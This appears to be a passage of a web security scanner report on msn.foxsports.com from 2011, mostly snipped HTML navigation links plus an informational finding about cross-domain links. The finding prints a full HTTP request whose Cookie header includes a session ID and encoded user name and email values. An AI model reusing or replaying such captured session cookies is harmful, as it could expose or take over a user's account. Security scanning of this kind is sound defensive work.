                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportssouthwest.com/01/05/11/Tannehill-hopes-to-continue-winning-ways/landing_big12.html?blockID=385631&amp;feedID=3673' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Keep the change');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Keep the change') });location.href=this.href;">
<div id="blurb_1" align="left" class="blurb">
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=48114488-a888-4448-b344-8fb1ecea3a4b&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=48114488-a888-4448-b344-8fb1ecea3a4b&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=774730db-321d-4814-9560-e9895e6362fb&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=774730db-321d-4814-9560-e9895e6362fb&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=e1306351-49cd-46ea-a3d7-79b2a69cfe00&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=e1306351-49cd-46ea-a3d7-79b2a69cfe00&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=84bd31d5-014e-4785-8605-6181ca29653c&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=84bd31d5-014e-4785-8605-6181ca29653c&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=56d32140-ebac-4239-b840-b66eec346410&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=56d32140-ebac-4239-b840-b66eec346410&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...


   
<a href="http://network.yardbarker.com/mma/article_external/shields_confirms_fight_with_georges_st_pierre/3922215" title="Shields confirms fight with St. Pierre at UFC 129">Shields confirms fight with St. Pierre at UFC 129</a>
...[SNIP]...


   
        <a href="http://network.yardbarker.com/mma/article_external/shields_confirms_fight_with_georges_st_pierre/3922215" title="Shields confirms fight with St. Pierre at UFC 129"></a>
...[SNIP]...


   
<a href="http://network.yardbarker.com/mma/article_external/brandon_vera_marcus_davis_released_from_ufc_following_ufc_125_losses/3925656" title="Brandon Vera, Marcus Davis released from UFC">Brandon Vera, Marcus Davis released from UFC</a>
...[SNIP]...


   
        <a href="http://network.yardbarker.com/mma/article_external/brandon_vera_marcus_davis_released_from_ufc_following_ufc_125_losses/3925656" title="Brandon Vera, Marcus Davis released from UFC"></a>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.7. http://msn.foxsports.com/collegefootball/gameTrax

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegefootball/gameTrax

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /collegefootball/gameTrax?gameId=201101070084 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 251329
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Sat, 08 Jan 2011 00:48:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<!-- CSS/JS Collection -->


<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d775349/7/775549/randm.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
